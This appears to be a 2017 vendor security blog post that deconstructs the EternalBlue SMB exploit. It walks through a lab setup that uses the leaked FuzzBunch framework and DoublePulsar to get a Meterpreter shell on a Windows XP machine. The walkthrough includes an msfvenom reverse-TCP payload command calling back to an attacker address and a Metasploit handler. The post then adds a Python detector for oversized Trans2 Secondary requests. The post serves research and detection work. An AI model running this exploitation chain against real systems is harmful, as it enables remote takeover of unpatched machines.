Wei Gao, Blog Author
Senior Security Research Engineer
Deconstructing EternalBlue

May 17, 2017 by Wei Gao

EternalBlue is a server message block (SMB) vulnerability that can lead to code execution. It is part of the FuzzBunch toolkit released by the Shadow Brokers, much like the firewall toolkit we covered last August. FuzzBunch is an exploit framework, similar to Metasploit, and it contains many exploits. For example, EmeraldThread is an SMB exploit for Windows XP and Server 2003 (patched by MS10-061). ErraticGopher is an SMBv1 exploit targeting Windows XP and Server 2003. EskimoRoll is a Kerberos exploit targeting 2000, 2003, 2008 and 2008 R2 domain controllers (MS14-068). EternalBlue can be used to attack any Windows OS from XP to Server 2012.

WannaCry ransomware uses the EternalBlue exploit to propagate in a worm-like fashion. In this section, we will go through the steps required to configure an environment that uses the FuzzBunch framework to launch EternalBlue and the DoublePulsar implant to get a Metasploit Meterpreter shell on a target machine.

Reproducing EternalBlue to get a Meterpreter shell:

To reproduce the EternalBlue exploit, we will set up three virtual machines for testing.

Attacking machine: Windows 7 SP1 with Python 2.6.6 and pywin32 installed. Download the Shadow Brokers "Lost in Translation" leak.

Kali machine: creates the reverse TCP DLL and receives the reverse shell from the target machine.

Target machine: Windows XP running the SMB service.

Using msfvenom, create a DLL-format Meterpreter reverse TCP shell on Kali:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.41.149 LPORT=4444 -f dll > reverser_tcp.dll

Next, make sure the target machine is running the SMB service and that TCP port 445 is open.

On the Windows 7 attacking machine, go to the windows folder of the Shadow Brokers dump and run python fb.py. Set the target IP address and the callback IP address (the Kali machine). Do not use redirection in this case. The FuzzBunch framework also requires a log directory path; here we just use c:\logs.

To use the EternalBlue exploit, type the command use eternalblue in the FB terminal. We keep the default configuration, so just hit "enter" at each prompt.

Since the target machine is Windows XP in this case, we select XP as the target OS and FB as the delivery mechanism.

Launch the EternalBlue exploit until you get a successful response:

On the Kali machine, we set up the Metasploit multi/handler listener to receive the reverse shell: run msfconsole, select exploit/multi/handler, and set lhost and lport to match the values used when the DLL was generated.

To inject our DLL file, go back to the attacking machine and type use doublepulsar in the FuzzBunch terminal. Select SMB as the protocol and RunDLL as the backdoor type.

We input the path of the reverse TCP shell DLL generated on Kali.

Configure the rest of the options and execute DoublePulsar:

After DoublePulsar has successfully injected the DLL, the Kali machine receives a reverse TCP Meterpreter shell from the target machine:

Ixia's ATI-2017-09 update was rebuilt to include the EternalBlue strike responsible for this massive global attack. The strike in this updated release exploits a buffer overflow vulnerability in the Microsoft Windows SMB service. The vulnerability can be triggered when a large amount of data is sent in a Trans2 Secondary request. A remote, unauthenticated attacker could exploit this vulnerability to execute arbitrary code on the target system. This strike simulates the use of the Shadow Brokers EternalBlue exploit against both a Windows XP system and a Windows 7 system. In the BreakingPoint GUI, you can search for the keyword "eternalblue" and add the strike for validation.
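The trigger described above, an unusually large amount of data in an SMBv1 Trans2 Secondary request, is something a network sensor can look for directly. The following Python script is an added example written for this post; it is not Ixia's code and not part of the ATI strike. It parses NetBIOS-framed SMB1 messages, decodes the nine parameter words of an SMB_COM_TRANSACTION2_SECONDARY request (command 0x33, as laid out in MS-CIFS), and raises an alert when the advertised TotalDataCount or the ByteCount exceeds a threshold, or when DataCount is larger than the bytes actually present. The 4096-byte threshold, the build_trans2_secondary helper and the SAMPLE_TRAFFIC messages are constructed for this example and are assumptions, not values from the leak or from the strike.

```python
"""Heuristic detector for oversized SMBv1 Trans2 Secondary requests.

Added example, not Ixia's code. Assumes NetBIOS session framing (TCP 445)
in front of each SMB1 message. The threshold is an assumption to tune.
"""
import struct

NBSS_SESSION_MESSAGE = 0x00          # NetBIOS session service message type
SMB1_MAGIC = b"\xffSMB"
SMB1_HEADER_LEN = 32                 # fixed SMB1 header size
SMB_FLAGS_REPLY = 0x80               # set in Flags when the message is a response
SMB_COM_TRANSACTION2_SECONDARY = 0x33
SMB_COM_NEGOTIATE = 0x72
DEFAULT_MAX_TRANS2_DATA = 4096       # assumed threshold, tune per environment

# Field order of the nine parameter words of a Trans2 Secondary request
TRANS2_SECONDARY_FIELDS = (
    "TotalParameterCount", "TotalDataCount", "ParameterCount",
    "ParameterOffset", "ParameterDisplacement", "DataCount",
    "DataOffset", "DataDisplacement", "FID",
)


def parse_smb1(message):
    """Parse one NetBIOS-framed SMB1 message into the fields the detector needs.

    Returns None when the bytes are not a well-formed SMB1 message.
    """
    # NBSS header (4) + SMB header (32) + WordCount (1) + ByteCount (2)
    if len(message) < 4 + SMB1_HEADER_LEN + 3:
        return None
    if message[0] != NBSS_SESSION_MESSAGE:
        return None
    nbss_len = int.from_bytes(message[1:4], "big")
    if nbss_len != len(message) - 4:
        return None                  # framing length disagrees with the bytes seen
    smb = message[4:]
    if smb[:4] != SMB1_MAGIC:
        return None
    command = smb[4]                 # Command byte follows the 4-byte magic
    flags = smb[9]                   # Flags byte follows the 4-byte Status
    word_count = smb[SMB1_HEADER_LEN]
    words_start = SMB1_HEADER_LEN + 1
    words_end = words_start + 2 * word_count
    if len(smb) < words_end + 2:
        return None
    byte_count = struct.unpack_from("<H", smb, words_end)[0]
    return {
        "command": command,
        "is_reply": bool(flags & SMB_FLAGS_REPLY),
        "word_count": word_count,
        "words": smb[words_start:words_end],
        "byte_count": byte_count,
        "data_bytes_present": len(smb) - (words_end + 2),
    }


def decode_trans2_secondary(parsed):
    """Return the decoded parameter words of a Trans2 Secondary request, else None."""
    if parsed["command"] != SMB_COM_TRANSACTION2_SECONDARY or parsed["is_reply"]:
        return None
    if parsed["word_count"] != 9:    # the request always carries nine words
        return None
    values = struct.unpack("<9H", parsed["words"])
    return dict(zip(TRANS2_SECONDARY_FIELDS, values))


def detect_oversized_trans2(messages, max_data=DEFAULT_MAX_TRANS2_DATA):
    """Scan raw messages and return one alert dict per suspicious request."""
    alerts = []
    for index, raw in enumerate(messages):
        parsed = parse_smb1(raw)
        if parsed is None:
            continue
        t2 = decode_trans2_secondary(parsed)
        if t2 is None:
            continue
        reasons = []
        if t2["TotalDataCount"] > max_data:
            reasons.append("TotalDataCount=%d" % t2["TotalDataCount"])
        if parsed["byte_count"] > max_data:
            reasons.append("ByteCount=%d" % parsed["byte_count"])
        if t2["DataCount"] > parsed["data_bytes_present"]:
            reasons.append("DataCount=%d exceeds bytes present=%d"
                           % (t2["DataCount"], parsed["data_bytes_present"]))
        if reasons:
            alerts.append({"index": index, "fid": t2["FID"], "reasons": reasons})
    return alerts


def build_trans2_secondary(total_data, data_count, fid=0x4000):
    """Constructed test input: a well-formed Trans2 Secondary request with zero-filled data."""
    header = SMB1_MAGIC + bytes([SMB_COM_TRANSACTION2_SECONDARY])
    header += b"\x00" * 4                       # Status
    header += b"\x18"                           # Flags (request, canonical paths)
    header += b"\x07\xc0"                       # Flags2
    header += b"\x00" * 2 + b"\x00" * 8 + b"\x00" * 2   # PIDHigh, SecurityFeatures, Reserved
    header += struct.pack("<HHHH", 0x0800, 0xfeff, 0x0800, 0x0041)  # TID, PID, UID, MID
    data = b"\x00" * data_count
    data_offset = SMB1_HEADER_LEN + 1 + 18 + 2  # data follows WordCount, words, ByteCount
    words = struct.pack("<9H", 0, total_data, 0, 0, 0, data_count, data_offset, 0, fid)
    smb = header + bytes([9]) + words + struct.pack("<H", len(data)) + data
    return bytes([NBSS_SESSION_MESSAGE]) + len(smb).to_bytes(3, "big") + smb


# Constructed sample traffic: benign-sized request, oversized request,
# an SMB Negotiate request (ignored by the detector) and non-SMB bytes.
SAMPLE_TRAFFIC = [
    build_trans2_secondary(total_data=100, data_count=100),
    build_trans2_secondary(total_data=0xFFFF, data_count=4096),
    b"\x00\x00\x00\x25" + SMB1_MAGIC + bytes([SMB_COM_NEGOTIATE]) + b"\x00" * 27
    + b"\x00" + b"\x02\x00" + b"\x02\x00",
    b"not smb at all",
]

if __name__ == "__main__":
    for alert in detect_oversized_trans2(SAMPLE_TRAFFIC):
        print("ALERT message #%d FID=0x%04x: %s"
              % (alert["index"], alert["fid"], ", ".join(alert["reasons"])))
```

Run against a packet capture, the same functions would be fed the reassembled TCP payloads of port 445 sessions; the threshold only flags unusually large transaction data and is a heuristic, so pair it with patch and SMBv1 inventory data rather than treating a hit as proof of exploitation.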

Leverage Subscription Service to Stay Ahead of Attacks

The Ixia BreakingPoint Application and Threat Intelligence (ATI) Subscription provides bi-weekly updates of the latest application protocols and attacks for use with Ixia platforms.
